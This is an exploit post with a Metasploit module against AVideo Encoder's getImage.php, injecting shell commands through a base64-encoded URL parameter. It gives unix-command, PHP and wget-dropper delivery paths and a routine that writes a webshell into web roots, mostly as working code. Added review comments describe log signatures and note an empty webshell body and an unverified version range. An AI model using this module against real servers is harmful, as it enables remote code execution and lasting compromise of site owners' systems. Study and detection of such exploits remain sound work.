====================================================================================================================== | # Title : AVideo versions prior to 7.0 Metasploit Module Command Injection | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://www.avideo.com/ | ====================================================================================================================== [+] Summary : The Metasploit exploit module targets a command injection vulnerability in AVideo This module exploits a base64-encoded command injection flaw in AVideo Encoder’s image processing endpoint, turning a simple URL parameter into remote code execution with multiple payload strategies. [+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
##

# Metasploit exploit module for a command injection in AVideo Encoder's
# getImage.php. Every command goes out as a single GET whose base64Url
# parameter decodes to a URL with the command wrapped in backticks (see
# build_payload and execute_command).
#
# Defensive note: the observable signature on the wire is a request to
# Encoder/objects/getImage.php whose base64Url value base64-decodes to a URL
# containing backticks; that is what web logs / WAF rules should key on.
#
# NOTE(review): the page title says "versions prior to 7.0" while the module
# metadata below carries DisclosureDate 2020-10-15; nothing in the module
# establishes the affected-version range, so confirm it against the vendor
# advisory before relying on it.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  # Module metadata and datastore options.
  # The three targets select the delivery strategy dispatched in #exploit;
  # TIMEOUT bounds each HTTP request, Delay (advanced) is the pause between
  # dependent commands.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'AVideo Encoder getImage.php Command Injection',
      'Description' => %q{ Command injection in AVideo via base64Url parameter. 
},
      'Author' => ['indoushka'],
      'License' => MSF_LICENSE,
      'Platform' => ['unix', 'linux', 'php'],
      'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X86, ARCH_X64],
      'Targets' => [
        ['Unix Command', { 'Type' => :unix_cmd }],
        ['PHP Command', { 'Type' => :php_cmd }],
        ['Linux Dropper', { 'Type' => :linux_dropper }]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2020-10-15'
    ))
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptInt.new('TIMEOUT', [true, 'Timeout', 10]),
      OptString.new('WEBSHELL_NAME', [false, 'Webshell name', 'shell.php']),
      OptBool.new('UPLOAD_WEBSHELL', [false, 'Upload webshell', false])
    ])
    register_advanced_options([
      OptInt.new('Delay', [false, 'Delay', 1])
    ])
  end

  # Sends one GET to Encoder/objects/getImage.php with the encoded command in
  # the base64Url parameter (format=png) and returns the response body, or
  # nil if the connection fails.
  #
  # @param cmd [String] shell command to inject
  # @return [String, nil] response body; nil on Rex::ConnectionError or when
  #   the request itself returned nil
  # NOTE(review): only Rex::ConnectionError is rescued; any other failure
  # propagates to the caller.
  def execute_command(cmd)
    payload = build_payload(cmd)
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'Encoder', 'objects', 'getImage.php'),
        'vars_get' => {
          'base64Url' => payload,
          'format' => 'png'
        },
        'timeout' => datastore['TIMEOUT']
      })
      return res&.body
    rescue ::Rex::ConnectionError
      return nil
    end
  end

  # Builds the base64Url value: the command is placed in backticks inside a
  # fixed placeholder URL, then base64-encoded. The decoded form of this
  # string is the artifact a defender will find in access logs.
  #
  # @param cmd [String] shell command
  # @return [String] base64 of "http://test.com/`cmd`"
  def build_payload(cmd)
    injected = "http://test.com/`#{cmd}`"
    Rex::Text.encode_base64(injected)
  end

  # Entry point. Refuses to run unless ForceExploit is set or `check`
  # reports Vulnerable, then dispatches on the selected target type and
  # optionally drops a webshell afterwards.
  #
  # NOTE(review): no `check` method is defined in this module, so `check`
  # here resolves to whatever the framework base class provides — confirm
  # which CheckCode that returns; if it is not Vulnerable, this gate only
  # passes with ForceExploit.
  def exploit
    unless datastore['ForceExploit'] || check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, 'Target not vulnerable')
    end
    print_status("Exploiting...")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :php_cmd
      execute_php_payload
    when :linux_dropper
      execute_cmdstager
    end
    upload_webshell if datastore['UPLOAD_WEBSHELL']
  end

  # PHP target: echoes php_code into a random /tmp/<alpha6>.php, registers
  # that file for cleanup, waits Delay seconds, then runs it with the php CLI.
  # As listed here php_code is the empty string, so the dropped file is
  # empty; the /tmp/*.php write and the follow-up php invocation are the
  # host-side artifacts of this path.
  def execute_php_payload
    print_status("Executing PHP payload...")
    php_code = ""
    tmp_file = "/tmp/#{Rex::Text.rand_text_alpha(6)}.php"
    execute_command("echo '#{php_code}' > #{tmp_file}")
    register_file_for_cleanup(tmp_file)
    sleep(datastore['Delay'])
    execute_command("php #{tmp_file}")
  end

  # Linux dropper target: delegates to CmdStager with a fixed :wget flavor
  # and /tmp as the staging directory, using Delay between stages.
  def execute_cmdstager
    print_status("Running cmdstager...")
    super(
      :delay => datastore['Delay'],
      :flavor => :wget,
      :temp => '/tmp'
    )
  end

  # Writes `code` as WEBSHELL_NAME into each candidate directory in turn and
  # stops at the first one where a follow-up `ls` does not report
  # "No such file". As listed here `code` is the empty string.
  #
  # NOTE(review): datastore['WritablePath'] is not registered in this
  # module's options, so it is nil unless set elsewhere; the nil/empty guard
  # in the loop skips it in that case.
  # Defensive note: unlike the /tmp file above, this file is never passed to
  # register_file_for_cleanup, so a successful run leaves WEBSHELL_NAME under
  # one of the listed web roots — a durable on-disk indicator for IR.
  def upload_webshell
    print_status("Uploading webshell...")
    webshell = datastore['WEBSHELL_NAME']
    code = ""
    paths = [
      datastore['WritablePath'],
      '/var/www/html/',
      '/var/www/',
      './'
    ]
    paths.each do |p|
      next if p.nil? || p.empty?
      # normalise to a trailing slash so the filename can be appended directly
      path = p.end_with?('/') ? p : p + '/'
      execute_command("echo '#{code}' > #{path}#{webshell}")
      sleep(datastore['Delay'])
      res = execute_command("ls #{path}#{webshell}")
      if res && !res.include?("No such file")
        print_good("Webshell likely uploaded: #{path}#{webshell}")
        break
      end
    end
  end

  # Output helpers: prefix every framework console message with "[AVideo]".
  def print_status(msg)
    super("[AVideo] #{msg}")
  end

  def print_good(msg)
    super("[AVideo] #{msg}")
  end

  def print_error(msg)
    super("[AVideo] #{msg}")
  end

  def print_warning(msg)
    super("[AVideo] #{msg}")
  end
end
Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================